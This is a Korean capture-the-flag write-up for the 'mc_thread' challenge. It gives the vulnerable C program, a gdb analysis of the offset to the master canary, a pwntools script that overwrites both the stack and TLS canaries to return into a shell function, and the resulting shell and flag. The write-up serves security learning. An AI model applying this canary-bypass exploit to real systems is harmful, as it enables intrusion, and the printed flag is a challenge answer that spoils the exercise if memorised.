문제 코드
// Name: mc_thread.c
// Compile: gcc -o mc_thread mc_thread.c -pthread -no-pie
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void giveshell() { execve("/bin/sh", 0, 0); }
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
}
int read_bytes (char *buf, int len) {
int idx = 0;
int read_len = 0;
for (idx = 0; idx < len; idx++) {
int ret;
ret = read(0, buf+idx, 1);
if (ret < 0) {
return read_len;
}
read_len ++;
}
return read_len;
}
void thread_routine() {
char buf[256];
int size = 0;
printf("Size: ");
scanf("%d", &size);
printf("Data: ");
//read(0, buf, size);
read_bytes(buf, size);
}
int main() {
pthread_t thread_t;
init();
if (pthread_create(&thread_t, NULL, (void *)thread_routine, NULL) < 0) {
perror("thread create error:");
exit(0);
}
pthread_join(thread_t, 0);
return 0;
}
- 실습에서 했던 것처럼 카나리를 무작위 값으로 변조하고 해당 값으로 카나리 값을 덮어 보호 기법을 우회하면 될거 같습니다.
보호 기법
❯ checksec mc_thread
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[*] '/root/mc_thread'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Canary와 NX 방어 기법이 걸려있습니다.
공격 준비
환경: ubuntu 18.04
먼저 버퍼와 카나리 거리 차를 구해보면
gef➤ disas thread_routine
Dump of assembler code for function thread_routine:
0x000000000040093f <+0>: push rbp
0x0000000000400940 <+1>: mov rbp,rsp
0x0000000000400943 <+4>: sub rsp,0x120
0x000000000040094a <+11>: mov rax,QWORD PTR fs:0x28
0x0000000000400953 <+20>: mov QWORD PTR [rbp-0x8],rax
0x0000000000400957 <+24>: xor eax,eax
0x0000000000400959 <+26>: mov DWORD PTR [rbp-0x114],0x0
0x0000000000400963 <+36>: lea rdi,[rip+0x182] # 0x400aec
0x000000000040096a <+43>: mov eax,0x0
0x000000000040096f <+48>: call 0x400710 <printf@plt>
0x0000000000400974 <+53>: lea rax,[rbp-0x114]
0x000000000040097b <+60>: mov rsi,rax
0x000000000040097e <+63>: lea rdi,[rip+0x16e] # 0x400af3
0x0000000000400985 <+70>: mov eax,0x0
0x000000000040098a <+75>: call 0x400770 <__isoc99_scanf@plt>
0x000000000040098f <+80>: lea rdi,[rip+0x160] # 0x400af6
0x0000000000400996 <+87>: mov eax,0x0
0x000000000040099b <+92>: call 0x400710 <printf@plt>
0x00000000004009a0 <+97>: mov edx,DWORD PTR [rbp-0x114]
0x00000000004009a6 <+103>: lea rax,[rbp-0x110]
0x00000000004009ad <+110>: mov esi,edx
0x00000000004009af <+112>: mov rdi,rax
0x00000000004009b2 <+115>: call 0x4008d7 <read_bytes>
0x00000000004009b7 <+120>: nop
0x00000000004009b8 <+121>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004009bc <+125>: xor rax,QWORD PTR fs:0x28
0x00000000004009c5 <+134>: je 0x4009cc <thread_routine+141>
0x00000000004009c7 <+136>: call 0x400700 <__stack_chk_fail@plt>
0x00000000004009cc <+141>: leave
0x00000000004009cd <+142>: ret
End of assembler dump.
gef➤ b * 0x000000000040099b
Breakpoint 1 at 0x40099bgef➤ r
Starting program: /root/mc_thread
warning: Error disabling address space randomization: Operation not permitted
[*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffe2ffec000'
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fb75d8b6700 (LWP 526)]
Size: 100
[Switching to Thread 0x7fb75d8b6700 (LWP 526)]
gef➤ x/x $rbp-0x110
0x7fb75d8b5de0: 0x00000000
gef➤ $ ($fs_base+0x28)-0x7fb75d8b5de0
2376
0x948
0b100101001000
b'\tH'
b'H\t'거리차는 0x948 입니다.
익스플로잇 코드
from pwn import *
p = remote("host3.dreamhack.games", 22524)
elf = ELF('./mc_thread')
giveshell = elf.symbols['giveshell']
payload = b"A"*264 # buffer
payload += b"A"*8 # canary
payload += b"B"*8 # SFP
payload += p64(giveshell) # RET
payload += b"A"*(0x948-len(payload))
payload += p64(0x4141414141414141) # master canary
inp_sz = len(payload)
p.sendlineafter("Size: ", str(inp_sz))
p.sendlineafter("Data: ", payload)
p.interactive()익스플로잇 코드를 실행시켜보면
❯ python3 exploit.py
[+] Opening connection to host3.dreamhack.games on port 22524: Done
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[*] '/root/mc_thread'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Switching to interactive mode
$ 쉘이 뜹니다.
flag를 출력해보면
$ ls
flag
mc_thread
$ cat flag
DH{7a8a433f0b4738471fc40dca9d2d9831}